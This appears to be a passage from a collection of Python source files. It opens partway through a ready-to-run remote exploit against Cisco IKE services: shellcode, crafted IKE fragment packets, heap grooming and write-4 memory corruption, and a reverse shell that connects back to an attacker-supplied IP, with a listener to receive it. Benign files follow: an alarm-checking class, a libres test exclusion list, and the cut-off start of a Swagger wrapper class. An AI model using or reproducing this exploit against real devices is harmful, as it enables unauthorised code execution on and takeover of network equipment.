"\x6d\x70\x8d\x1c\x24\xb8\x05\x00\x00\x00\xcd\x80\x50\xeb\x31\x59"
"\x8b\x11\x8d\x49\x04\x89\xc3\xb8\x04\x00\x00\x00\xcd\x80\x5b\xb8"
"\x06\x00\x00\x00\xcd\x80\x8d\x1c\x24\x31\xd2\x52\x53\x8d\x0c\x24"
"\xb8\x0b\x00\x00\x00\xcd\x80\x31\xdb\xb8\x01\x00\x00\x00\xcd\x80"
"\xe8\xca\xff\xff\xff\x46\x01\x00\x00\x7f\x45\x4c\x46\x01\x01\x01"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00"
"\x00\x54\x80\x04\x08\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x34\x00\x20\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xf2\x00\x00"
"\x00\xf2\x00\x00\x00\x07\x00\x00\x00\x00\x10\x00\x00\x55\x89\xe5"
"\x83\xec\x10\x6a\x00\x6a\x01\x6a\x02\x8d\x0c\x24\xbb\x01\x00\x00"
"\x00\xb8\x66\x00\x00\x00\xcd\x80\x83\xc4\x0c\x89\x45\xfc\x68\x7f"
"\x00\x00\x01\x68\x02\x00\x04\x38\x8d\x14\x24\x6a\x10\x52\x50\x8d"
"\x0c\x24\xbb\x03\x00\x00\x00\xb8\x66\x00\x00\x00\xcd\x80\x83\xc4"
"\x14\x85\xc0\x7d\x18\x6a\x00\x6a\x01\x8d\x1c\x24\x31\xc9\xb8\xa2"
"\x00\x00\x00\xcd\x80\x83\xc4\x08\xeb\xc4\x8b\x45\xfc\x83\xec\x20"
"\x8d\x0c\x24\xba\x03\x00\x00\x00\x8b\x5d\xfc\xc7\x01\x05\x01\x00"
"\x00\xb8\x04\x00\x00\x00\xcd\x80\xba\x04\x00\x00\x00\xb8\x03\x00"
"\x00\x00\xcd\x80\xc7\x01\x05\x01\x00\x01\xc7\x41\x04\x0a\x64\x00"
"\x01\x66\xc7\x41\x08\x11\x5c\xba\x0a\x00\x00\x00\xb8\x04\x00\x00"
"\x00\xcd\x80\xba\x20\x00\x00\x00\xb8\x03\x00\x00\x00\xcd\x80\x83"
"\xc4\x20\x8b\x5d\xfc\xb9\x02\x00\x00\x00\xb8\x3f\x00\x00\x00\xcd"
"\x80\x49\x7d\xf6\x31\xd2\x68\x2d\x69\x00\x00\x89\xe7\x68\x2f\x73"
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x53\x8d\x0c\x24\xb8"
"\x0b\x00\x00\x00\xcd\x80\x31\xdb\xb8\x01\x00\x00\x00\xcd\x80\x31"
"\xc0\xc3"
)
# SA Session
class Session(object):
def __init__(self, host_port, id = None):
if id == None:
id = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
self._host, self._port = host_port
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._id = id
self._mid = 1
# Init session
print("[+] Using session ID: " + self._id)
self.send(self.make_SA())
# Check if we got something
res = self.recv()
cookie = res[8:16]
print("[+] Cookie: " + cookie)
self._cookie = cookie
# Enforce value of 0x21
if ord(res[16]) != 0x21:
raise Exception("Invalid router response")
print("[+] New SA successfuly created.")
# UPD socket helpers
def send(self, buf):
self._sock.sendto(buf, (self._host, self._port))
def recv(self, size = 4096):
data, addr = self._sock.recvfrom(size)
return data
def make_SA(self):
buf = ""
buf += self._id # Initiator SPI
buf += "\x00"*8 # Responder SPI
buf += "\x21" # next payload (security association)
buf += "\x20" # version
buf += "\x22" # exchange type
buf += "\x08" # flags
buf += "\x00"*4 # message ID
buf += "$$$$" # length
# stolen from pcap
# THIS IS SECURITY ASSOCIATION
buf += "\x22\x00\x00\x6c\x00\x00\x00\x68\x01\x01\x00\x0b\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x01\x00\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x00\x80\x03\x00\x00\x08\x01\x00\x00\x03\x03\x00\x00\x08\x01\x00\x00\x02\x03\x00\x00\x08\x02\x00\x00\x02\x03\x00\x00\x08\x02\x00\x00\x01\x03\x00\x00\x08\x03\x00\x00\x02\x03\x00\x00\x08\x03\x00\x00\x01\x03\x00\x00\x08\x04\x00\x00\x02\x03\x00\x00\x08\x04\x00\x00\x05\x00\x00\x00\x08\x04\x00\x00\x0e"
# THIS IS KEY EXCHANGE
# this is the type of the next payload...
buf += "\x28" # 0x28 = Nonce, 0x2b = vendor ID
# KEY EXCHANGE DATA
buf += "\x00\x00\x88\x00\x02\x00\x00\x50\xea\xf4\x54\x1c\x61\x24\x1b\x59\x3f\x48\xcb\x12\x8c\xf1\x7f\x5f\xd4\xd8\xe9\xe2\xfd\x3c\x66\x70\xef\x08\xf6\x56\xcd\x83\x16\x65\xc1\xdf\x1c\x2b\xb1\xc4\x92\xca\xcb\xd2\x68\x83\x8e\x2f\x12\x94\x12\x48\xec\x78\x4b\x5d\xf3\x57\x87\x36\x1b\xba\x5b\x34\x6e\xec\x7e\x39\xc1\xc2\x2d\xf9\x77\xcc\x19\x39\x25\x64\xeb\xb7\x85\x5b\x16\xfc\x2c\x58\x56\x11\xfe\x49\x71\x32\xe9\xe8\x2d\x27\xbe\x78\x71\x97\x7a\x74\x42\x30\x56\x62\xa2\x99\x9c\x56\x0f\xfe\xd0\xa2\xe6\x8f\x72\x5f\xc3\x87\x4c\x7c\x9b\xa9\x80\xf1\x97\x57\x92"
# this is the Nonce payload
buf += "\x2b"
buf += "\x00\x00\x18\x97\x40\x6a\x31\x04\x4d\x3f\x7d\xea\x84\x80\xe9\xc8\x41\x5f\x84\x49\xd3\x8c\xee"
# lets try a vendor id or three
buf += "\x2b" # next payload, more vendor ID
buf += "\x00" # critical bit
vid = "CISCO-DELETE-REASON"
buf += struct.pack(">H", len(vid)+4)
buf += vid
# another vendor id
buf += "\x2b" # next payload, more vendor ID
buf += "\x00" # critical bit
vid = "CISCO(COPYRIGHT)&Copyright (c) 2009 Cisco Systems, Inc."
buf += struct.pack(">H", len(vid)+4)
buf += vid
# another vendor id
buf += "\x2b" # next payload, more vid
buf += "\x00" # crit
vid = "CISCO-GRE-MODE"
buf += struct.pack(">H", len(vid)+4)
buf += vid
# last vendor id
buf += "\x00" # next payload
buf += "\x00"
vid = "\x40\x48\xb7\xd5\x6e\xbc\xe8\x85\x25\xe7\xde\x7f\x00\xd6\xc2\xd3"
buf += struct.pack(">H", len(vid)+4)
buf += vid
return buf.replace("$$$$", struct.pack(">L", len(buf)))
def make_cisco_fragment(self, flength, seqno, fragid, lastfrag, sploit):
buf = ''
buf += self._id # Initiator SPI (random)
buf += self._cookie # Responder SPI
buf += "\x84" # next payload
buf += "\x20" # version
buf += "\x25" # exchange type (2=identify protection)
buf += "\x08" # flags
buf += "\x00\x00\x00\x01" # message ID
buf += "ABCD" # length
# PAYLOAD
payload = ""
payload += "\x00" # next payload (none)
payload += "\x00" # critical bit
payload += struct.pack(">H", flength) #payload_len) # length
payload += struct.pack(">H", fragid) # frag ID
payload += struct.pack("B", seqno) # frag sequence
payload += struct.pack("B", lastfrag)
payload += sploit
buf += payload
return buf.replace("ABCD", struct.pack(">L", len(buf)))
def send_fragment(self, flength, seqno, fragid, lastfrag, sploit):
buf = self.make_cisco_fragment(flength, seqno, fragid, lastfrag, sploit)
self.send(buf)
# We're not supposed to receive anything if everything went
# according to plan
def make_cisco_option_list(self, opt_lst):
buf = ''
buf += self._id # Initiator SPI (random)
buf += self._cookie # Responder SPI
buf += "\x2f" # next payload
buf += "\x20" # version
buf += "\x25" # exchange type (2=identify protection)
buf += "\x08" # flags
buf += struct.pack(">I", 1) # message ID
buf += "ABCD" # length
# PAYLOAD
payload = ""
payload += "\x00" # next payload (none)
payload += "\x00" # critical bit
payload += "EF" #payload_len) # length
payload += "\x03" # CFG_SET
payload += "\x00\x00\x00" # Reserved
total = 0x8
for size, n in opt_lst:
option = struct.pack(">H", 0x6000) #id
option += struct.pack(">H", size) # data length
option += "A" * (size)
total += (size + 4) * n
payload += option * n
buf += payload
packet = buf.replace("ABCD", struct.pack(">L", len(buf))).replace("EF", struct.pack(">H", total))
return packet
class Exploit(object):
def __init__(self, host, revHost, revPort = 4444):
self._host = host
self._port = 500
self._revHost = revHost
self._revPort = revPort
self._sessions = []
# Create a new SA session
def create_SA(self, id = None):
# Create a new socket for session
sess = Session((self._host, self._port), id)
# Append to session list
self._sessions.append(sess)
return sess
# Interact with reverse shell
def interact(self):
from telnetlib import Telnet
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self._revHost, self._revPort))
s.listen(5)
cli = s.accept()[0]
s.close()
print("[+] Got connect-back")
t = Telnet()
t.sock = cli
t.interact()
def buildPayload(self, cli = False):
if cli == False:
buf = bytearray(shShellcode)
# Adjust IP and port
buf[0x1ad:0x1b1] = socket.inet_aton(self._revHost)
buf[0x1b5:0x1b7] = struct.pack(">H", self._revPort)
Shellcode = bytes(buf)
else:
Shellcode = cliShellcode.replace("@IP@", self._revHost).replace("@PORT@", str(self._revPort))
return Shellcode
if __name__ == "__main__":
if len(sys.argv) < 3:
print("[+] Usage: {0:s} <cisco IP> <attacker IP>[:port]".format(sys.argv[0]))
sys.exit(0)
#TODO: Check host
host = sys.argv[1]
revHost = sys.argv[2]
# Parse revHost
port = 4444
if revHost.rfind(":") != -1:
revHost, port = revHost.split(":")
port = int(port)
exploit = Exploit(host, revHost, port)
sess1 = exploit.create_SA()
sess2 = exploit.create_SA()
n = 0xd6
sess2.send_fragment(0x8 + n + 3, 1, 5, 0, "A" * (n + 3))
# Send packets which will trigger the vulnerability
# Weird packet to get a size of 0x1
sess2.send_fragment(8 + -7, 0, 6, 1, "A" * (256 - 7))
# This fragment will be the one being copied
# during the memory corruption
buf = "A" * (n - 0xd + 0x3)
buf += struct.pack("<I", 0xef000000)
buf += struct.pack("<I", 0x00a11ccd) # chunk magics
buf += struct.pack("<I", 0xe100d4d0)
buf += struct.pack("B", 0x61) # set size from 0x31 to 0x61 in order to encompass the
# adjacent chunk on free
sess2.send_fragment(8 + n + 3, 1, 6, 0, buf)
sess1.send_fragment(0x8 + 0xf8, 1, 0xeb, 0, "A" * 0xf8)
pkt = sess1.make_cisco_option_list((
(0xd0, 0x30),
)
)
# Defragment heap
sess1.send(pkt)
sess1.send(pkt)
sess1.send(pkt)
# Prepare a fake chunk
buf = ""
buf += struct.pack("<I", 0x60)
buf += struct.pack("<I", 0x102)
buf += struct.pack("<I", 0xa11c0123)
buf += struct.pack("<I", 0xe0)
buf += "A" * 0xe8
# And allocate it right after a 0x100 bytes hole
sess1.send_fragment(0x8 + 0xf8, 2, 0xeb, 0, buf)
# Trigger the overflow
sess2.send_fragment(8 + -7, 3, 6, 1, "A" * (256 - 7))
# Retrieve of fake freed block
#buf = "\xcc" * (0xd0 - len(buf))
buf = "\x00" * 0xd0
buf += struct.pack("<I", 0xe100d4d0)
buf += struct.pack("<I", 0x31)
# this is a special writable address in the process
# it translate into the following executable code:
# nop / jmp [ecx]
# since ecx happens to hold a pointer to a controlled buffer
# the execution flow will be redirected to attacker controlled data
what = 0xc821ff90
# Just some writable address in the process which doesn't seem to be used
where = 0xc8002000 - 0x8
buf += struct.pack("<I", what)
buf += struct.pack("<I", where)
buf += struct.pack("<I", 0xf3ee0123)
buf += struct.pack("<I", 0x0) * 5
buf += struct.pack("<I", 0x5ee33210)
buf += struct.pack("<I", 0xf3eecdef)
buf += struct.pack("<I", 0x30)
buf += struct.pack("<I", 0x132)
buf += struct.pack("<I", 0xa11c0123)
buf += struct.pack("<I", 0x100)
buf += struct.pack("<I", 0x0) * 2
# Second write-4 pointers
# This is the address of the pointer to the "list_add" function
# which will give us control of execution flow
where = 0x0A99B7A4 - 0x10
# This is the address where the opcode sequence "nop / jmp [ecx]" is located
what = 0xc8002000
buf += struct.pack("<I", what)
buf += struct.pack("<I", where)
buf += "\x00" * (0x128 - len(buf))
# Try to chain a config list and a fragment packet
packet = bytearray()
packet += sess1._id # Initiator SPI (random)
packet += sess1._cookie # Responder SPI
packet += "\x2f" # next payload option list
packet += "\x20" # version
packet += "\x25" # exchange type (2=identify protection)
packet += "\x08" # flags
packet += struct.pack(">I", 1) # message ID
packet += "XXXX" # total length including header
payload = bytearray()
payload += "\x00" # next payload (frag)
payload += "\x00" # critical bit
payload += "\x00\x00" # payload length
payload += "\x03" # CFG_SET
payload += "\x00\x00\x00" # Reserved
size = 0x130
option = struct.pack(">H", 0x8400) #id
option += struct.pack(">H", size) # data length
option += "\x90" * 0x8 + buf
payload += option * 0x10
# Update payload length
payload[2:4] = struct.pack(">H", len(payload))
packet += payload
# Update payload length
packet[0x18:0x1C] = struct.pack(">I", len(packet))
packet = bytes(packet)
# Reallocate the fake freed 0x130 bytes chunk with controlled data
# this way we can perform a write-4 memory corruption when freeing
# the subsequent memory
sess1.send(packet)
time.sleep(0.2)
#raw_input()
packet = bytearray()
packet += sess1._id # Initiator SPI (random)
packet += sess1._cookie # Responder SPI
packet += "\x84" # next payload option list
packet += "\x20" # version
packet += "\x25" # exchange type (2=identify protection)
packet += "\x08" # flags
packet += struct.pack(">I", 1) # message ID
packet += "XXXX" # total length including header
buf = exploit.buildPayload(cli = True)
flength = len(buf) + 0x8
fragid = 0xeb
seqno = 0x5
lastfrag = 0
payload = bytearray()
# Jump over garbage directly into shellcode (interpreted as jmp +0x6)
payload += "\xeb" # next payload (none)
payload += "\x06" # critical bit
payload += struct.pack(">H", flength) #payload_len) # length
payload += struct.pack(">H", fragid) # frag ID
payload += struct.pack("B", seqno) # frag sequence
payload += struct.pack("B", lastfrag)
payload += buf
packet += payload
# Update payload length
packet[0x18:0x1C] = struct.pack(">I", len(packet))
packet = bytes(packet)
# Trigger the 2 write-4 and get code execution
sess1.send(packet)
# Hopefully we'll get something interesting
exploit.interact()
| pesaply/sarafu | donot.py | Python | mit | 18,176 |
'''
Created on Apr 2, 2012
@author: Paul Klingelhuber - [email protected]
'''
import os
import Util
import sys
import traceback
from SimpleMailer import SimpleMailer
import Config
class Alarms(object):
'''
The Alarms class is responsible for discovering and running the alarm trigger checkers
contains the alarm checking code
'''
## this is the name of the variable which alarm trigger checkers have to include \n
## e.g.: \n
## CHECK_FOR = "cpuTimes" \n
## this has to be at the root level of an alarm trigger file
ALARM_CHECKFORNAME = "CHECK_FOR"
## the function name for the checking function \n
## e.g.:
ALARM_METHODNAME = "doCheck"
def __init__(self, oldValues=None, newValues=None):
'''
Constructor
oldData map of old values
newData map of new values
keys are what was checked (node names in xml)
values are the actual values
'''
if oldValues is None:
oldValues = {}
if newValues is None:
newValues = {}
## a dictionary of all the old values
self.oldValues = oldValues
## dictionary of all the new (current) values
self.newValues = newValues
## all alarms that were triggered
self.alarms = []
def __runAlarmCheckers(self):
'''
Runs all the alarm checker scripts found in the alarm folder.
The scripts must define a variable called CHECK_FOR which holds the
name of which item to check against
additionally a function that is called doCheck(p1, p2) and receives two
parameters, the first one will hold the value from a previous reporting
run (if there was any) and the second will hold the current value
if the function returns nothing (or None) it means no alarm is triggered
when it returns something, the string version of it will be inserted in the
alarm log
'''
lst = os.listdir(Util.GETPATH("./alarms"))
loadme = []
resDict = {}
for entry in lst:
if (entry.endswith(".py") and entry.find("__init__") == -1):
loadme.append(entry)
for reporter in loadme:
try:
modname = reporter[:-3]
name = "alarms." + modname
mod = Util.simpleImport(name)
checkForAttr = getattr(mod, self.ALARM_CHECKFORNAME)
oldVal = self.oldValues.get(checkForAttr, None)
newVal = self.newValues.get(checkForAttr, None)
if newVal is not None:
functionToCall = getattr(mod, self.ALARM_METHODNAME)
result = functionToCall(oldVal, newVal)
if (result is not None):
print("alarm for %s, alarm msg: %s"%(checkForAttr,result))
self.alarms.append([checkForAttr, str(result)])
else:
print("ERROR: we don't have any value for '%s', won't check"%checkForAttr)
except:
print("Unexpected error:" + str(sys.exc_info()))
print(traceback.format_exc())
return resDict
def __reportAlarms(self, systemName):
'''
if there are alarms, this will trigger the mail sending
'''
if len(self.alarms) < 1:
return
msg = '\n'.join(self.messagesOnly())
title = 'ALARMS of ' + systemName
msg = title + '\n' + msg
if Config.ALERT_EMAIL_ENABLED:
SimpleMailer().send(title, msg)
def messagesOnly(self):
for item in self.alarms:
yield item[1]
def checkForAlarms(self, systemName):
'''
call this from external code to trigger the alarm checking
'''
self.__runAlarmCheckers()
try:
self.__reportAlarms(systemName)
except:
print("Error reporting the alarms:" + str(sys.exc_info()))
print(traceback.format_exc())
| NoUsername/PyReport | PyReport/Alarms.py | Python | bsd-3-clause | 4,199 |
import os
def get_excluded_files(root):
excluded_files = [
"ert/__init__.py",
"res/analysis/enums/__init__.py",
"ert/config/__init__.py",
"res/analysis/enums/analysis_module_load_status_enum.py",
"ert/enkf/export/__init__.py",
"res/analysis/enums/analysis_module_options_enum.py",
"res/analysis/linalg.py",
"res/config/__init__.py",
"ert/enkf/enums/__init__.py",
"res/config/config_path_elm.py",
"res/config/config_error.py",
"res/__init__.py",
"ert/enkf/__init__.py",
"res/config/unrecognized_enum.py",
"res/config/schema_item.py",
"res/config/content_type_enum.py",
"res/enkf/active_list.py",
"res/enkf/__init__.py",
"res/enkf/config/__init__.py",
"res/config/config_parser.py",
"res/config/config_settings.py",
"res/enkf/analysis_iter_config.py",
"res/enkf/config/field_type_enum.py",
"res/enkf/config/custom_kw_config.py",
"res/enkf/config/ext_param_config.py",
"res/config/config_content.py",
"res/enkf/config/summary_config.py",
"res/enkf/config/field_config.py",
"res/analysis/analysis_module.py",
"res/enkf/data/__init__.py",
"res/enkf/custom_kw_config_set.py",
"res/enkf/config/gen_data_config.py",
"res/enkf/config/gen_kw_config.py",
"res/enkf/data/custom_kw.py",
"res/enkf/data/field.py",
"res/enkf/analysis_config.py",
"res/enkf/data/gen_data.py",
"res/enkf/enkf_defaults.py",
"res/enkf/data/summary.py",
"res/enkf/data/enkf_node.py",
"res/enkf/data/ext_param.py",
"res/enkf/enkf_linalg.py",
"res/enkf/data/gen_kw.py",
"res/enkf/enkf_fs.py",
"res/enkf/enkf_state.py",
"res/enkf/config/enkf_config_node.py",
"res/enkf/enums/__init__.py",
"res/enkf/ecl_config.py",
"res/enkf/enums/active_mode_enum.py",
"res/enkf/enums/enkf_fs_type_enum.py",
"res/enkf/enkf_simulation_runner.py",
"res/enkf/enums/enkf_field_file_format_enum.py",
"res/enkf/enums/enkf_init_modes_enum.py",
"res/enkf/config_keys.py",
"res/enkf/enums/enkf_obs_impl_type_enum.py",
"res/enkf/enums/enkf_run_enum.py",
"res/enkf/enums/enkf_truncation_type.py",
"res/enkf/enums/enkf_var_type_enum.py",
"res/enkf/enums/hook_runtime_enum.py",
"res/enkf/enkf_fs_manager.py",
"res/enkf/enums/gen_data_file_type_enum.py",
"res/enkf/enkf_obs.py",
"res/enkf/enums/load_fail_type_enum.py",
"res/enkf/enums/ert_impl_type_enum.py",
"res/enkf/enums/realization_state_enum.py",
"res/enkf/export/__init__.py",
"res/enkf/ert_template.py",
"res/enkf/es_update.py",
"res/enkf/export/design_matrix_reader.py",
"res/enkf/export/arg_loader.py",
"res/enkf/export/custom_kw_collector.py",
"res/enkf/export/gen_data_collector.py",
"res/enkf/ert_templates.py",
"res/enkf/ert_run_context.py",
"res/enkf/export/gen_data_observation_collector.py",
"res/enkf/export/misfit_collector.py",
"res/enkf/enkf_main.py",
"res/enkf/export/gen_kw_collector.py",
"res/enkf/forward_load_context.py",
"res/enkf/ert_workflow_list.py",
"res/enkf/export/summary_collector.py",
"res/enkf/export/summary_observation_collector.py",
"res/enkf/hook_workflow.py",
"res/enkf/local_ministep.py",
"res/enkf/local_obsdata_node.py",
"res/enkf/ensemble_config.py",
"res/enkf/local_dataset.py",
"res/enkf/local_updatestep.py",
"res/enkf/local_config.py",
"res/enkf/hook_manager.py",
"res/enkf/node_id.py",
"res/enkf/local_obsdata.py",
"res/enkf/log_config.py",
"res/enkf/observations/block_data_config.py",
"res/enkf/key_manager.py",
"res/enkf/meas_block.py",
"res/enkf/obs_block.py",
"res/enkf/meas_data.py",
"res/enkf/plot/__init__.py",
"res/enkf/observations/block_observation.py",
"res/enkf/obs_data.py",
"res/enkf/plot/data_fetcher.py",
"res/enkf/observations/gen_observation.py",
"res/enkf/observations/summary_observation.py",
"res/enkf/plot/ensemble_gen_data_fetcher.py",
"res/enkf/observations/obs_vector.py",
"res/enkf/plot/block_observation_data_fetcher.py",
"res/enkf/plot/ensemble_block_data_fetcher.py",
"res/enkf/plot/ensemble_data_fetcher.py",
"res/enkf/plot_data/__init__.py",
"res/enkf/plot/ensemble_gen_kw_fetcher.py",
"res/enkf/model_config.py",
"res/enkf/plot_data/ensemble_plot_data_vector.py",
"res/enkf/plot_data/ensemble_plot_gen_data_vector.py",
"res/enkf/plot_data/ensemble_plot_data.py",
"res/enkf/plot/observation_data_fetcher.py",
"res/enkf/plot_data/ensemble_plot_gen_data.py",
"res/enkf/plot_data/ensemble_plot_gen_kw_vector.py",
"res/enkf/plot/refcase_data_fetcher.py",
"res/enkf/plot_data/plot_block_data.py",
"res/enkf/plot_data/ensemble_plot_gen_kw.py",
"res/enkf/plot/observation_gen_data_fetcher.py",
"res/enkf/plot_data/plot_block_vector.py",
"res/enkf/plot_data/pca_plot_vector.py",
"res/enkf/plot_data/pca_plot_data.py",
"res/enkf/plot_data/plot_block_data_loader.py",
"res/enkf/rng_config.py",
"res/enkf/run_arg.py",
"res/enkf/plot/pca_fetcher.py",
"res/enkf/runpath_list.py",
"res/enkf/util/__init__.py",
"res/enkf/queue_config.py",
"res/enkf/summary_key_matcher.py",
"res/enkf/summary_key_set.py",
"res/fm/ecl/__init__.py",
"res/enkf/state_map.py",
"res/fm/ecl/script.py",
"res/fm/rms/__init__.py",
"res/fm/rms/rms_config.py",
"res/enkf/site_config.py",
"res/enkf/subst_config.py",
"res/fm/shell/__init__.py",
"res/fm/templating/__init__.py",
"res/enkf/util/time_map.py",
"res/job_queue/__init__.py",
"res/fm/templating/template_render.py",
"res/job_queue/environment_varlist.py",
"res/fm/ecl/ecl_config.py",
"res/job_queue/ert_plugin.py",
"res/job_queue/driver.py",
"res/job_queue/ext_joblist.py",
"res/job_queue/external_ert_script.py",
"res/fm/rms/rms_run.py",
"res/fm/ecl/ecl_run.py",
"res/job_queue/forward_model.py",
"res/job_queue/ert_script.py",
"res/job_queue/function_ert_script.py",
"res/fm/shell/shell.py",
"res/job_queue/job.py",
"res/job_queue/run_status_type_enum.py",
"res/job_queue/job_status_type_enum.py",
"res/job_queue/ext_job.py",
"res/job_queue/forward_model_status.py",
"res/job_queue/job_queue_node.py",
"res/job_queue/workflow_joblist.py",
"res/job_queue/job_queue_manager.py",
"res/job_queue/workflow.py",
"res/sched/history_source_enum.py",
"res/simulator/__init__.py",
"res/job_queue/workflow_runner.py",
"res/sched/history.py",
"res/sched/sched_file.py",
"res/test/synthesizer/__init__.py",
"res/simulator/batch_simulator_context.py",
"res/job_queue/queue.py",
"res/simulator/batch_simulator.py",
"res/enkf/res_config.py",
"res/test/synthesizer/perlin.py",
"res/test/ert_test_context.py",
"res/util/enums/__init__.py",
"res/job_queue/workflow_job.py",
"res/util/enums/llsq_result_enum.py",
"res/util/arg_pack.py",
"res/test/synthesizer/prime_generator.py",
"res/util/log.py",
"res/util/enums/message_level_enum.py",
"res/util/cthread_pool.py",
"res/simulator/simulation_context.py",
"res/util/res_log.py",
"res/util/res_version.py",
"res/util/path_format.py",
"res/util/stat.py",
"tests/__init__.py",
"tests/conftest.py",
"res/test/synthesizer/shaped_perlin.py",
"tests/global/test_import.py",
"tests/legacy/test_analysis.py",
"tests/ctest_run.py",
"tests/legacy/test_config.py",
"res/util/substitution_list.py",
"tests/legacy/test_sched.py",
"tests/legacy/test_job_queue.py",
"res/test/synthesizer/oil_simulator.py",
"res/util/ui_return.py",
"tests/res/analysis/test_options_enum.py",
"tests/res/analysis/test_linalg.py",
"tests/legacy/test_enkf.py",
"tests/res/analysis/test_std_enkf.py",
"tests/import_tester.py",
"tests/res/analysis/test_std_enkf_debug.py",
"res/util/matrix.py",
"tests/res/enkf/data/test_enkf_config_node.py",
"tests/res/enkf/data/test_enkf_node.py",
"tests/res/enkf/data/test_field_config.py",
"tests/res/enkf/data/test_gen_data.py",
"tests/res/analysis/test_rml.py",
"tests/res/enkf/data/test_gen_kw_config.py",
"tests/res/analysis/test_analysis_module.py",
"tests/res/enkf/data/test_custom_kw.py",
"tests/res/enkf/data/test_custom_kw_config.py",
"tests/res/enkf/data/test_gen_data_config.py",
"tests/res/enkf/data/test_summary.py",
"tests/res/enkf/export/test_arg_loader.py",
"tests/res/enkf/data/test_gen_kw_config_equinor.py",
"tests/res/enkf/export/test_gen_data_collector.py",
"tests/res/enkf/export/test_custom_kw_collector.py",
"tests/res/enkf/data/test_gen_kw.py",
"tests/res/enkf/data/test_ext_param.py",
"tests/res/enkf/export/test_misfit_collector.py",
"tests/res/enkf/export/test_gen_data_observation_collector.py",
"tests/res/enkf/plot/__init__.py",
"tests/res/enkf/export/test_gen_kw_collector.py",
"tests/res/enkf/export/test_summary_collector.py",
"tests/res/enkf/test_analysis_iter_config.py",
"tests/res/enkf/export/test_export_join.py",
"tests/res/enkf/export/test_summary_observation_collector.py",
"tests/res/enkf/test_active_list.py",
"tests/res/enkf/test_data_kw_define.py",
"tests/res/enkf/plot/test_plot_data.py",
"tests/res/enkf/export/test_design_matrix.py",
"tests/res/enkf/test_block_obs.py",
"tests/res/enkf/test_analysis_config.py",
"tests/res/enkf/test_enkf_fs.py",
"tests/res/enkf/test_custom_kw_config_set.py",
"tests/res/enkf/test_enkf_fs_manager2.py",
"tests/res/enkf/test_enkf_fs_manager1.py",
"tests/res/enkf/test_enkf_library.py",
"tests/res/enkf/test_ecl_config.py",
"tests/res/enkf/test_enkf_load_results_manually.py",
"tests/res/enkf/test_enkf_runpath.py",
"tests/res/enkf/test_ert_run_context.py",
"tests/res/enkf/test_enkf_transfer_env.py",
"tests/res/enkf/test_enkf_sim_model.py",
"tests/res/config/test_config.py",
"tests/res/enkf/test_ensemble_config.py",
"tests/res/enkf/test_forward_load_context.py",
"tests/res/enkf/test_ert_context.py",
"tests/res/enkf/test_field_config.py",
"tests/res/enkf/test_enkf.py",
"tests/res/enkf/test_hook_workflow.py",
"tests/res/enkf/test_gen_obs.py",
"tests/res/enkf/test_es_update.py",
"tests/res/enkf/test_ert_templates.py",
"tests/res/enkf/test_local_obsdata_node.py",
"tests/res/enkf/test_field_export.py",
"tests/res/enkf/test_key_manager.py",
"tests/res/enkf/test_labscale.py",
"tests/res/enkf/test_local_dataset.py",
"tests/res/enkf/test_enkf_obs.py",
"tests/res/enkf/test_hook_manager.py",
"tests/res/enkf/test_meas_block.py",
"tests/res/enkf/test_local_config.py",
"tests/res/enkf/test_meas_data.py",
"tests/res/enkf/test_obs_block.py",
"tests/res/enkf/test_queue_config.py",
"tests/res/enkf/test_log_config.py",
"tests/res/enkf/test_obs_data.py",
"tests/res/enkf/test_run_context.py",
"tests/res/enkf/test_model_config.py",
"tests/res/enkf/test_runpath_list_dump.py",
"tests/res/enkf/test_rng_config.py",
"tests/res/enkf/test_runpath_list_ert.py",
"tests/res/enkf/test_site_config.py",
"tests/res/enkf/test_simulation_batch.py",
"tests/res/enkf/test_summary_key_matcher.py",
"tests/res/enkf/test_summary_obs.py",
"tests/res/enkf/test_runpath_list.py",
"tests/res/enkf/test_summary_key_set.py",
"tests/res/enkf/test_update.py",
"tests/res/enkf/test_state_map.py",
"tests/res/enkf/test_workflow_list.py",
"tests/res/enkf/test_subst_config.py",
"tests/res/fm/test_fm_config.py",
"tests/res/fm/test_rms_config.py",
"tests/res/enkf/test_programmatic_res_config.py",
"tests/res/job_queue/test_equinor_jobmanager.py",
"tests/res/enkf/test_time_map.py",
"tests/res/job_queue/test_ert_plugin.py",
"tests/res/fm/test_ecl_config.py",
"tests/res/job_queue/test_ert_script.py",
"tests/res/fm/test_templating.py",
"tests/res/job_queue/test_function_ert_script.py",
"tests/res/job_queue/test_ext_job.py",
"tests/res/fm/test_rms_run.py",
"tests/res/fm/test_ecl_run.py",
"tests/res/job_queue/test_job_queue_manager.py",
"tests/res/job_queue/test_workflow_joblist.py",
"tests/res/enkf/test_res_config.py",
"tests/res/job_queue/test_job_queue.py",
"tests/res/job_queue/test_workflow.py",
"tests/res/sched/test_sched.py",
"tests/res/job_queue/test_workflow_job.py",
"tests/res/run/test_run.py",
"tests/res/fm/test_shell.py",
"tests/res/testcase/test_testcase.py",
"tests/res/util/test_log.py",
"tests/res/job_queue/test_workflow_runner.py",
"tests/res/testcase/test_mini_config.py",
"tests/res/testcase/test_testarea.py",
"tests/res/util/test_path_fmt.py",
"tests/res/simulator/test_simulation_context.py",
"tests/res/job_queue/workflow_common.py",
"tests/res/util/test_stat.py",
"tests/res/util/test_res_log.py",
"tests/res/util/test_substitution_list.py",
"tests/utils/__init__.py",
"tests/res/util/test_ui_return.py",
"tests/share/test_synthesizer.py",
"tests/res/job_queue/test_forward_model_formatted_print.py",
"tests/res/util/test_matrix.py",
"tests/res/simulator/test_batch_sim.py",
]
return [os.path.join(root, fname) for fname in excluded_files]
| Statoil/libres | python/tests/excluded_files.py | Python | gpl-3.0 | 14,799 |
from django.utils import six
from djsw_wrapper.router import SwaggerRouter
from djsw_wrapper.errors import SwaggerValidationError, SwaggerGenericError
import flex
import os
import re
class Swagger():
# handle is local filename, file object, string or url
def __init__(self, handle, module):
self.schema = None
self.module = None
self.loaded = False
self.handle = handle
